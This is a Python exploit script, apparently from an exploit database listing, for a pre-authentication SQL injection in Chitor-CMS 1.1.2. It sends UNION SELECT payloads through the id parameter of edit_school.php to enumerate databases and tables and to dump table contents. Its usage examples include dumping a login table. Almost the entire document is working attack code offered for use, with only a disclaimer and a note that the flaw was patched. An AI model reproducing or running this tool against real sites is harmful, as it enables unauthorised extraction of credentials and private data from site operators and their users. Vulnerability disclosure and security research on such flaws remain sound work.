Share
## https://sploitus.com/exploit?id=PACKETSTORM:171952
#!/usr/bin/python3  
  
#######################################################  
# #   
# Exploit Title: Chitor-CMS v1.1.2 - Pre-Auth SQL Injection #  
# Date: 2023/04/13 #  
# ExploitAuthor: msd0pe #  
# Project: https://github.com/waqaskanju/Chitor-CMS #  
# My Github: https://github.com/msd0pe-1 #  
# Patched the 2023/04/16: 69d3442 commit #  
# #  
#######################################################  
  
__description__ = 'Chitor-CMS < 1.1.2 Pre-Auth SQL Injection.'  
__author__ = 'msd0pe'  
__version__ = '1.1'  
__date__ = '2023/04/13'  
  
class bcolors:  
PURPLE = '\033[95m'  
BLUE = '\033[94m'  
GREEN = '\033[92m'  
OCRA = '\033[93m'  
RED = '\033[91m'  
CYAN = '\033[96m'  
ENDC = '\033[0m'  
BOLD = '\033[1m'  
UNDERLINE = '\033[4m'  
  
class infos:  
INFO = "[" + bcolors.OCRA + bcolors.BOLD + "?" + bcolors.ENDC + bcolors.ENDC + "] "  
ERROR = "[" + bcolors.RED + bcolors.BOLD + "X" + bcolors.ENDC + bcolors.ENDC + "] "  
GOOD = "[" + bcolors.GREEN + bcolors.BOLD + "+" + bcolors.ENDC + bcolors.ENDC + "] "  
PROCESS = "[" + bcolors.BLUE + bcolors.BOLD + "*" + bcolors.ENDC + bcolors.ENDC + "] "  
  
import re  
import requests  
import optparse  
from prettytable import PrettyTable  
  
def DumpTable(url, database, table):  
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}  
x = PrettyTable()  
columns = []  
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=\"" + table + "\" AND table_schema=\"" + database + "\"-- -"  
u = requests.get(url + payload, headers=header)  
try:  
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)  
r = r[0].replace('\"',"").split(',')  
if r == []:  
pass  
else:  
for i in r:  
columns.append(i)  
pass  
except:  
pass  
x.field_names = columns  
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2C " + str(columns).replace("[","").replace("]","").replace("\'","").replace(" ","") + "))%2C0x716a6b6271) FROM " + database + "." + table + "-- -"  
u = requests.get(url + payload, headers=header)  
try:  
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)  
r = r[0].replace('\"',"").split(',')  
if r == []:  
pass  
else:  
for i in r:  
i = i.split("xzmdpl")  
x.add_rows([i])  
except ValueError:  
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)  
r = r[0].replace('\"',"").split(',')  
if r == []:  
pass  
else:  
for i in r:  
i = i.split("xzmdpl")  
i.append("")  
x.add_rows([i])   
print(x)  
  
def ListTables(url, database):  
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}  
x = PrettyTable()  
x.field_names = ["TABLES"]  
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x" + str(database).encode('utf-8').hex() + ")-- -"  
u = requests.get(url + payload, headers=header)  
try:  
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)  
r = r[0].replace('\"',"").split(',')  
if r == []:  
pass  
else:  
for i in r:  
x.add_row([i])  
except:  
pass  
print(x)  
  
def ListDatabases(url):  
header = {"User-Agent": "5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"}  
x = PrettyTable()  
x.field_names = ["DATABASES"]  
payload = "/edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -"  
u = requests.get(url + payload, headers=header)  
try:  
r = re.findall("qpzkq\[(.*?)\]qjkbq",u.text)  
r = r[0].replace('\"',"").split(',')  
if r == []:  
pass  
else:  
for i in r:  
x.add_row([i])  
except:  
pass  
print(x)  
  
def Main():  
Menu = optparse.OptionParser(usage='python %prog [options]', version='%prog ' + __version__)  
Menu.add_option('-u', '--url', type="str", dest="url", help='target url')  
Menu.add_option('--dbs', action="store_true", dest="l_databases", help='list databases')  
Menu.add_option('-D', '--db', type="str", dest="database", help='select a database')  
Menu.add_option('--tables', action="store_true", dest="l_tables", help='list tables')  
Menu.add_option('-T', '--table', type="str", dest="table", help='select a table')  
Menu.add_option('--dump', action="store_true", dest="dump", help='dump the content')  
(options, args) = Menu.parse_args()  
  
Examples = optparse.OptionGroup(Menu, "Examples", """python3 chitor1.1.py -u http://127.0.0.1 --dbs  
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db --tables  
python3 chitor1.1.py -u http://127.0.0.1 -D chitor_db -T login --dump  
""")  
Menu.add_option_group(Examples)  
  
if len(args) != 0 or options == {'url': None, 'l_databases': None, 'database': None, 'l_tables': None, 'table': None, 'dump': None}:  
Menu.print_help()  
print('')  
print(' %s' % __description__)  
print(' Source code put in public domain by ' + bcolors.PURPLE + bcolors.BOLD + 'msd0pe' + bcolors.ENDC + bcolors.ENDC + ',' + bcolors.RED + bcolors.BOLD + 'no Copyright' + bcolors.ENDC + bcolors.ENDC)  
print(' Any malicious or illegal activity may be punishable by law')  
print(' Use at your own risk')  
  
elif len(args) == 0:  
try:  
if options.url != None:  
if options.l_databases != None:  
ListDatabases(options.url)  
if options.database != None:  
if options.l_tables != None:  
ListTables(options.url, options.database)  
if options.table != None:  
if options.dump != None:  
DumpTable(options.url, options.database, options.table)  
except:  
print("Unexpected error")  
  
if __name__ == '__main__':  
try:  
Main()  
  
except KeyboardInterrupt:  
print()  
print(infos.PROCESS + "Exiting...")  
print()  
exit(1)